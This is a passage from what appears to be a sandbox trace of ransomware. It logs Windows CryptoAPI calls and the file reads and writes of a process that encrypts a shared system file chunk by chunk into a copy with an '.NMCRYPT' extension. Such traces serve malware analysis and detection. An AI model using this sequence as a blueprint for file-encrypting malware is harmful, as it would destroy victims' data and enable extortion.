out: phKey=0x1d444978*=0x9ad538) returned 1 [0157.217] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0157.217] CryptSetKeyParam (hKey=0x9ad538, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0157.217] wcslen (_String="\\\\?\\") returned 0x4 [0157.217] CryptDuplicateKey (in: hKey=0x9ad538, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad278) returned 1 [0157.217] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0157.217] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0157.217] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=10947) returned 1 [0157.217] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0157.218] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.219] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.219] GetLastError () returned 0x0 [0157.219] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.290] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.290] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.291] GetLastError () returned 0x0 [0157.291] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.291] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.291] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.291] GetLastError () returned 0x0 [0157.291] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.291] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.291] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.291] GetLastError () returned 0x0 [0157.291] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.291] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.291] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.291] GetLastError () returned 0x0 [0157.291] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.291] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.291] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.291] GetLastError () returned 0x0 [0157.291] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.291] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.291] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.291] GetLastError () returned 0x0 [0157.291] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.291] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.291] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.291] GetLastError () returned 0x0 [0157.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.292] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.292] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.292] GetLastError () returned 0x0 [0157.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.292] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.292] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.292] GetLastError () returned 0x0 [0157.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.292] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.292] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.292] GetLastError () returned 0x0 [0157.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.292] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.292] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.292] GetLastError () returned 0x0 [0157.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.292] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.292] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.292] GetLastError () returned 0x0 [0157.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.292] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.292] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.292] GetLastError () returned 0x0 [0157.292] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.293] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.293] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.293] GetLastError () returned 0x0 [0157.293] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.293] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.293] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.293] GetLastError () returned 0x0 [0157.293] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.293] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.293] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.293] GetLastError () returned 0x0 [0157.293] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.293] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.293] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.293] GetLastError () returned 0x0 [0157.293] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.293] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.293] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.293] GetLastError () returned 0x0 [0157.293] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.293] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.293] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.293] GetLastError () returned 0x0 [0157.293] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.294] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.294] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.294] GetLastError () returned 0x0 [0157.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.294] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.294] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.294] GetLastError () returned 0x0 [0157.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.294] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.294] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.294] GetLastError () returned 0x0 [0157.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.294] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.294] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.294] GetLastError () returned 0x0 [0157.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.294] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.294] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.294] GetLastError () returned 0x0 [0157.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.294] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.294] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.294] GetLastError () returned 0x0 [0157.294] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.294] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.295] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.295] GetLastError () returned 0x0 [0157.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.295] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.295] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.295] GetLastError () returned 0x0 [0157.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.295] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.295] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.295] GetLastError () returned 0x0 [0157.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.295] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.295] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.295] GetLastError () returned 0x0 [0157.295] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, 